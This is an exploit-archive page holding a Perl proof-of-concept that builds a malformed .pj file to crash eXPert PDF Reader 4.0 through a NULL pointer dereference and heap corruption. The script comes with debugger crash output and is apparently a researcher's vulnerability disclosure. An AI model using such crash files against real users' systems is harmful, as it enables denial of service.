what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

eXPert PDF Reader 4.0 NULL Pointer Dereference / Heap Corruption

eXPert PDF Reader 4.0 NULL Pointer Dereference / Heap Corruption
Posted Feb 26, 2011
Authored by LiquidWorm | Site zeroscience.mk

eXPert PDF Reader version 4.0 suffers from a NULL pointer dereference and heap corruption denial of service vulnerability.

tags | exploit, denial of service
SHA-256 | 290623376432a2f10c80421fb38a2d32682190ff9321dac7e355092b1f5512ff

eXPert PDF Reader 4.0 NULL Pointer Dereference / Heap Corruption

Change Mirror Download
#!/usr/local/bin/perl
#
#
# eXPert PDF Reader 4.0 NULL Pointer Dereference and Heap Corruption Denial Of Service
#
#
# Vendor: Visagesoft
# Product web page: http://www.visagesoft.com
# Affected version: 4.0.210
#
# Summary: eXPert PDF Reader is a free pdf viewer software that lets you view and print
# pdf documents on windows operating systems.
#
# Desc: The vulnerability is caused due to a NULL pointer dereference when processing
# malicious Printer Job (.pj) files and can be exploited to crash the application and
# cause a heap corruption and denial of service scenarios.
#
# Tested on: Microsoft Windows XP Professional SP3 (EN)
#
# ----------------------------------------------------------------------------------
#
# HEAP[vspdfreader.exe]: Invalid allocation size - 82828290 (exceeded 7ffdefff)
# (77c.d48): Unknown exception - code 0eedfade (first chance)
# (77c.d48): Access violation - code c0000005 (first chance)
# First chance exceptions are reported before any exception handling.
# This exception may be expected and handled.
# eax=00000001 ebx=02d7a188 ecx=00bd311c edx=00000002 esi=00000002 edi=0012fe24
# eip=00446cc9 esp=0012fb6c ebp=0012fb84 iopl=0 nv up ei ng nz ac pe cy
# cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00210297
# *** WARNING: Unable to verify checksum for image00400000
# *** ERROR: Module load completed but symbols could not be loaded for image00400000
# image00400000+0x46cc9:
# 00446cc9 8b04b0 mov eax,dword ptr [eax+esi*4] ds:0023:00000009=????????
#
# image00400000+0x46cc9:
# 00446cc9 8b04b0 mov eax,dword ptr [eax+esi*4]
# 00446ccc 5e pop esi
# 00446ccd 5b pop ebx
# 00446cce c3 ret
# 00446ccf 90 nop
# 00446cd0 8bc8 mov ecx,eax
# 00446cd2 b201 mov dl,1
# 00446cd4 a1f48d4300 mov eax,dword ptr [image00400000+0x38df4 (00438df4)]
#
# image00400000+0x38df4:
# 00438df4 4c dec esp
# 00438df5 8e4300 mov es,word ptr [ebx]
# 00438df8 0000 add byte ptr [eax],al
# 00438dfa 0000 add byte ptr [eax],al
# 00438dfc 0000 add byte ptr [eax],al
# 00438dfe 0000 add byte ptr [eax],al
# 00438e00 0000 add byte ptr [eax],al
# 00438e02 0000 add byte ptr [eax],al
#
# ----------------------------------------------------------------------------------
#
# Vulnerability discovered by: Gjoko 'LiquidWorm' Krstic
# liquidworm gmail com
# Zero Science Lab - http://www.zeroscience.mk
#
# Advisory ID: ZSL-2011-5000
# Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2011-5000.php
#
#
# 25.02.2011
#

my $file = "dniz0r.pj";
my $data = ""; #my $data = "J" x(2+2);
open($FILE,">$file");
print $FILE $data;
close($FILE);
print "\npj File Created successfully\n";
Login or Register to add favorites

File Archive:

May 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    May 1st
    44 Files
  • 2
    May 2nd
    5 Files
  • 3
    May 3rd
    11 Files
  • 4
    May 4th
    0 Files
  • 5
    May 5th
    0 Files
  • 6
    May 6th
    28 Files
  • 7
    May 7th
    3 Files
  • 8
    May 8th
    4 Files
  • 9
    May 9th
    54 Files
  • 10
    May 10th
    12 Files
  • 11
    May 11th
    0 Files
  • 12
    May 12th
    0 Files
  • 13
    May 13th
    17 Files
  • 14
    May 14th
    11 Files
  • 15
    May 15th
    17 Files
  • 16
    May 16th
    13 Files
  • 17
    May 17th
    22 Files
  • 18
    May 18th
    0 Files
  • 19
    May 19th
    0 Files
  • 20
    May 20th
    17 Files
  • 21
    May 21st
    18 Files
  • 22
    May 22nd
    7 Files
  • 23
    May 23rd
    0 Files
  • 24
    May 24th
    0 Files
  • 25
    May 25th
    0 Files
  • 26
    May 26th
    0 Files
  • 27
    May 27th
    0 Files
  • 28
    May 28th
    0 Files
  • 29
    May 29th
    0 Files
  • 30
    May 30th
    0 Files
  • 31
    May 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close